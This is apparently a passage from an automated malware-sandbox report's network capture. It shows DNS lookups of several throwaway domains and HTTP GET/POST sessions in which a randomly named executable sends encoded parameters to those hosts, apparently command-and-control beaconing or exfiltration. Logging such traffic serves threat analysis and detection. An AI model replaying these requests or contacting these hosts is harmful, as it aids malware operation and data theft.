Nov 4, 2024 10:14:00.641124964 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.641449928 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.641455889 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.641505957 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:00.642085075 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.642091990 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.642133951 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:00.642688990 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.642729044 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:00.790349007 CET	80	50051	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:00.790397882 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:01.667908907 CET	50051	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:02.686382055 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:02.691453934 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:02.693882942 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:02.704837084 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:02.710020065 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.717515945 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.717622042 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.717633009 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.717669010 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:03.718060017 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.718071938 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.718085051 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.718125105 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:03.718868017 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.718880892 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.718915939 CET	50052	80	192.168.2.4	185.179.189.193
Nov 4, 2024 10:14:03.876471996 CET	80	50052	185.179.189.193	192.168.2.4
Nov 4, 2024 10:14:03.876524925 CET	50052	80	192.168.2.4	185.179.189.193

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 10:10:50.291186094 CET	65115	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:10:50.324906111 CET	53	65115	1.1.1.1	192.168.2.4
Nov 4, 2024 10:11:07.030610085 CET	60343	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:11:07.103246927 CET	53	60343	1.1.1.1	192.168.2.4
Nov 4, 2024 10:11:20.436469078 CET	59457	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:11:20.532737017 CET	53	59457	1.1.1.1	192.168.2.4
Nov 4, 2024 10:11:33.921128035 CET	55705	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:11:33.933542967 CET	53	55705	1.1.1.1	192.168.2.4
Nov 4, 2024 10:11:47.734350920 CET	64412	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:11:47.757488012 CET	53	64412	1.1.1.1	192.168.2.4
Nov 4, 2024 10:12:01.280463934 CET	61188	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:12:01.292308092 CET	53	61188	1.1.1.1	192.168.2.4
Nov 4, 2024 10:12:15.546422958 CET	58517	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:12:15.593027115 CET	53	58517	1.1.1.1	192.168.2.4
Nov 4, 2024 10:12:29.187151909 CET	64150	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:12:29.204574108 CET	53	64150	1.1.1.1	192.168.2.4
Nov 4, 2024 10:12:42.593579054 CET	59683	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:12:43.072535992 CET	53	59683	1.1.1.1	192.168.2.4
Nov 4, 2024 10:12:56.734651089 CET	51144	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:12:56.768651009 CET	53	51144	1.1.1.1	192.168.2.4
Nov 4, 2024 10:13:17.189733982 CET	50916	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:13:17.300240993 CET	53	50916	1.1.1.1	192.168.2.4
Nov 4, 2024 10:13:31.313060045 CET	59785	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:13:31.476702929 CET	53	59785	1.1.1.1	192.168.2.4
Nov 4, 2024 10:13:45.124957085 CET	58654	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:13:45.604346991 CET	53	58654	1.1.1.1	192.168.2.4
Nov 4, 2024 10:13:59.533781052 CET	59378	53	192.168.2.4	1.1.1.1
Nov 4, 2024 10:13:59.626602888 CET	53	59378	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 4, 2024 10:10:50.291186094 CET	192.168.2.4	1.1.1.1	0x5b79	Standard query (0)	www.budged.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:07.030610085 CET	192.168.2.4	1.1.1.1	0x28a0	Standard query (0)	www.cursosonline.bio	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:20.436469078 CET	192.168.2.4	1.1.1.1	0x2b5b	Standard query (0)	www.prediksipreman.fyi	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:33.921128035 CET	192.168.2.4	1.1.1.1	0x598	Standard query (0)	www.98yl9900.vip	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:47.734350920 CET	192.168.2.4	1.1.1.1	0x8d37	Standard query (0)	www.mjmegartravel.online	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:01.280463934 CET	192.168.2.4	1.1.1.1	0x13a7	Standard query (0)	www.energyparks.net	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:15.546422958 CET	192.168.2.4	1.1.1.1	0x4f5	Standard query (0)	www.electronify.shop	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:29.187151909 CET	192.168.2.4	1.1.1.1	0x7010	Standard query (0)	www.sibeta.info	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:42.593579054 CET	192.168.2.4	1.1.1.1	0xd912	Standard query (0)	www.j252mv.site	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:56.734651089 CET	192.168.2.4	1.1.1.1	0x825	Standard query (0)	www.dwmdconsulting.llc	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:17.189733982 CET	192.168.2.4	1.1.1.1	0x8deb	Standard query (0)	www.deepfy.xyz	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:31.313060045 CET	192.168.2.4	1.1.1.1	0x1408	Standard query (0)	www.time-change.fyi	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:45.124957085 CET	192.168.2.4	1.1.1.1	0xd1fc	Standard query (0)	www.5hdgb2p9a.buzz	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:59.533781052 CET	192.168.2.4	1.1.1.1	0xb232	Standard query (0)	www.jivatop.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 4, 2024 10:10:50.324906111 CET	1.1.1.1	192.168.2.4	0x5b79	No error (0)	www.budged.net	budged.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:10:50.324906111 CET	1.1.1.1	192.168.2.4	0x5b79	No error (0)	budged.net		195.154.200.15	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:07.103246927 CET	1.1.1.1	192.168.2.4	0x28a0	No error (0)	www.cursosonline.bio		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:20.532737017 CET	1.1.1.1	192.168.2.4	0x2b5b	No error (0)	www.prediksipreman.fyi	prediksipreman.fyi		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:11:20.532737017 CET	1.1.1.1	192.168.2.4	0x2b5b	No error (0)	prediksipreman.fyi		162.0.215.244	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:33.933542967 CET	1.1.1.1	192.168.2.4	0x598	No error (0)	www.98yl9900.vip		104.21.3.144	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:33.933542967 CET	1.1.1.1	192.168.2.4	0x598	No error (0)	www.98yl9900.vip		172.67.130.209	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:47.757488012 CET	1.1.1.1	192.168.2.4	0x8d37	No error (0)	www.mjmegartravel.online	mjmegartravel.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:11:47.757488012 CET	1.1.1.1	192.168.2.4	0x8d37	No error (0)	mjmegartravel.online		76.223.67.189	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:11:47.757488012 CET	1.1.1.1	192.168.2.4	0x8d37	No error (0)	mjmegartravel.online		13.248.213.45	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:01.292308092 CET	1.1.1.1	192.168.2.4	0x13a7	No error (0)	www.energyparks.net	energyparks.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:12:01.292308092 CET	1.1.1.1	192.168.2.4	0x13a7	No error (0)	energyparks.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:01.292308092 CET	1.1.1.1	192.168.2.4	0x13a7	No error (0)	energyparks.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:15.593027115 CET	1.1.1.1	192.168.2.4	0x4f5	No error (0)	www.electronify.shop	electronify.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:12:15.593027115 CET	1.1.1.1	192.168.2.4	0x4f5	No error (0)	electronify.shop		84.32.84.32	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:29.204574108 CET	1.1.1.1	192.168.2.4	0x7010	No error (0)	www.sibeta.info		162.0.231.203	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:43.072535992 CET	1.1.1.1	192.168.2.4	0xd912	No error (0)	www.j252mv.site		150.95.254.16	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:56.768651009 CET	1.1.1.1	192.168.2.4	0x825	No error (0)	www.dwmdconsulting.llc	dwmdconsulting.llc		CNAME (Canonical name)	IN (0x0001)	false
Nov 4, 2024 10:12:56.768651009 CET	1.1.1.1	192.168.2.4	0x825	No error (0)	dwmdconsulting.llc		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:12:56.768651009 CET	1.1.1.1	192.168.2.4	0x825	No error (0)	dwmdconsulting.llc		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:17.300240993 CET	1.1.1.1	192.168.2.4	0x8deb	No error (0)	www.deepfy.xyz		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:31.476702929 CET	1.1.1.1	192.168.2.4	0x1408	No error (0)	www.time-change.fyi		217.160.0.111	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:45.604346991 CET	1.1.1.1	192.168.2.4	0xd1fc	No error (0)	www.5hdgb2p9a.buzz		168.76.221.252	A (IP address)	IN (0x0001)	false
Nov 4, 2024 10:13:59.626602888 CET	1.1.1.1	192.168.2.4	0xb232	No error (0)	www.jivatop.online		185.179.189.193	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.budged.net

www.cursosonline.bio

www.prediksipreman.fyi

www.98yl9900.vip

www.mjmegartravel.online

www.energyparks.net

www.electronify.shop

www.sibeta.info

www.j252mv.site

www.dwmdconsulting.llc

www.deepfy.xyz

www.time-change.fyi

www.5hdgb2p9a.buzz

www.jivatop.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	195.154.200.15	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:10:50.343189001 CET	462	OUT	GET /rwi3/?Q8r=3l9HWofhi4qI6FgwzBgfqCSqepMbi+x/tP4hcqqML+ok6ico/8tPHaiq8anAIRqTRw/AlsoC6MOKOJSN91dw5wR1aaSWnnHTBS7NSUaA1IBUrmZ191OmHzE=&6trpq=anQT3n HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.budged.net Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
Nov 4, 2024 10:10:51.878318071 CET	1236	IN	HTTP/1.0 404 Not Found Date: Mon, 04 Nov 2024 09:10:51 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33 X-Powered-By: PHP/7.4.33 Content-Length: 1840 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 23 6e 6f 74 66 6f 75 6e 64 20 7b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!doctype html><html lang="en"><head> <meta charset="UTF-8"> <title>404</title> <style> * { -webkit-box-sizing: border-box; box-sizing: border-box } body { font-family: sans-serif; padding: 0; margin: 0 } #notfound { position: relative; height: 100vh } #notfound .notfound { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%) } .notfound { max-width: 767px; width: 100%; line-height: 1.4; padding: 0 15px } .notfound .notfound-404 { position: relative; height: 150px; line-height: 150px; margin-bottom: 25px } .notfound .not
Nov 4, 2024 10:10:51.878428936 CET	836	IN	Data Raw: 66 6f 75 6e 64 2d 34 30 34 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 20 20 20 20 20 Data Ascii: found-404 h1 { font-size: 186px; font-weight: 900; margin: 0; text-transform: uppercase; } .notfound h2 { font-size: 26px; font-weight: 700; m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49789	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:07.122508049 CET	744	OUT	POST /uq6t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.cursosonline.bio Origin: http://www.cursosonline.bio Content-Length: 200 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cursosonline.bio/uq6t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 55 6b 6d 4f 56 4a 51 4c 49 51 33 4b 76 6b 6d 61 48 73 45 6d 44 44 72 42 63 47 75 56 4a 64 2f 64 39 33 34 43 4d 30 43 44 51 4e 6f 54 4f 7a 4a 6e 76 56 71 49 58 4b 4f 71 65 6b 39 70 68 5a 62 6c 78 53 69 38 6d 6c 46 4a 5a 76 2b 62 58 41 64 68 42 7a 76 4c 6a 61 55 31 54 63 59 61 6b 61 32 75 76 4b 32 41 36 45 31 62 38 54 54 70 59 67 50 6c 6b 4e 67 58 30 6d 79 4b 2f 39 66 2b 48 48 71 2f 2f 78 37 67 74 6a 7a 56 47 6f 74 5a 5a 53 39 72 4b 73 34 2b 56 41 74 7a 6c 43 45 68 2f 35 6c 37 6b 33 42 76 7a 43 61 4c 55 53 49 6e 75 51 58 37 36 33 47 73 33 76 48 57 52 59 4d 74 4c 71 38 66 30 67 3d 3d Data Ascii: Q8r=UkmOVJQLIQ3KvkmaHsEmDDrBcGuVJd/d934CM0CDQNoTOzJnvVqIXKOqek9phZblxSi8mlFJZv+bXAdhBzvLjaU1TcYaka2uvK2A6E1b8TTpYgPlkNgX0myK/9f+HHq//x7gtjzVGotZZS9rKs4+VAtzlCEh/5l7k3BvzCaLUSInuQX763Gs3vHWRYMtLq8f0g==
Nov 4, 2024 10:11:07.738226891 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:11:06 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: 2a725c08-66c3-490c-acd4-c89cde05bc52 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q== set-cookie: parking_session=2a725c08-66c3-490c-acd4-c89cde05bc52; expires=Mon, 04 Nov 2024 09:26:07 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 35 31 62 2f 62 37 32 4e 2f 6f 35 64 32 59 56 64 49 61 59 65 39 63 39 42 67 33 54 6c 4c 52 68 55 42 45 53 58 34 52 33 6f 6c 35 6f 50 61 79 6d 56 5a 46 70 4a 61 72 35 58 31 54 42 4e 4c 55 7a 2f 2b 39 36 4d 68 66 4c 68 4e 38 4a 65 42 4f 30 62 65 6e 51 35 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:11:07.738344908 CET	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmE3MjVjMDgtNjZjMy00OTBjLWFjZDQtYzg5Y2RlMDViYzUyIiwicGFnZV90aW1lIjoxNzMwNzExND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49805	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 4, 2024 10:11:09.673387051 CET	764	OUT	POST /uq6t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.cursosonline.bio Origin: http://www.cursosonline.bio Content-Length: 220 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cursosonline.bio/uq6t/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13 Data Raw: 51 38 72 3d 55 6b 6d 4f 56 4a 51 4c 49 51 33 4b 67 6c 57 61 46 4c 6f 6d 45 6a 72 43 46 32 75 56 41 39 2f 52 39 33 30 43 4d 31 47 54 54 34 34 54 4c 6a 5a 6e 39 45 71 49 62 71 4f 71 48 55 39 57 6c 5a 62 2b 78 53 65 43 6d 6c 35 4a 5a 76 36 62 58 45 5a 68 42 41 48 49 69 4b 55 33 62 38 59 59 35 71 32 75 76 4b 32 41 36 48 49 4f 38 58 48 70 59 77 2f 6c 6c 6f 4d 51 6f 32 79 4c 72 74 66 2b 57 58 71 37 2f 78 37 65 74 6d 4f 36 47 71 56 5a 5a 54 4e 72 50 74 34 39 4d 77 74 78 72 69 46 30 78 5a 41 78 39 56 4d 37 2b 67 32 43 62 53 49 35 72 57 61 68 72 47 6e 37 6c 76 6a 6c 4d 66 46 5a 47 70 42 57 76 76 50 66 77 45 32 4f 70 79 69 73 68 34 61 53 2b 6c 70 71 44 44 55 3d Data Ascii: Q8r=UkmOVJQLIQ3KglWaFLomEjrCF2uVA9/R930CM1GTT44TLjZn9EqIbqOqHU9WlZb+xSeCml5JZv6bXEZhBAHIiKU3b8YY5q2uvK2A6HIO8XHpYw/lloMQo2yLrtf+WXq7/x7etmO6GqVZZTNrPt49MwtxriF0xZAx9VM7+g2CbSI5rWahrGn7lvjlMfFZGpBWvvPfwE2Opyish4aS+lpqDDU=
Nov 4, 2024 10:11:10.289351940 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 04 Nov 2024 09:11:09 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: 2213c6af-c617-460d-9d04-770e48a06d28 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q== set-cookie: parking_session=2213c6af-c617-460d-9d04-770e48a06d28; expires=Mon, 04 Nov 2024 09:26:10 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 35 31 62 2f 62 37 32 4e 2f 6f 35 64 32 59 56 64 49 61 59 65 39 63 39 42 67 33 54 6c 4c 52 68 55 42 45 53 58 34 52 33 6f 6c 35 6f 50 61 79 6d 56 5a 46 70 4a 61 72 35 58 31 54 42 4e 4c 55 7a 2f 2b 39 36 4d 68 66 4c 68 4e 38 4a 65 42 4f 30 62 65 6e 51 35 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_I51b/b72N/o5d2YVdIaYe9c9Bg3TlLRhUBESX4R3ol5oPaymVZFpJar5X1TBNLUz/+96MhfLhN8JeBO0benQ5Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 4, 2024 10:11:10.289648056 CET	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjIxM2M2YWYtYzYxNy00NjBkLTlkMDQtNzcwZTQ4YTA2ZDI4IiwicGFnZV90aW1lIjoxNzMwNzExND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49820	199.59.243.227	80	5332	C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe

Timestamp	Bytes transferred	Direction	Data
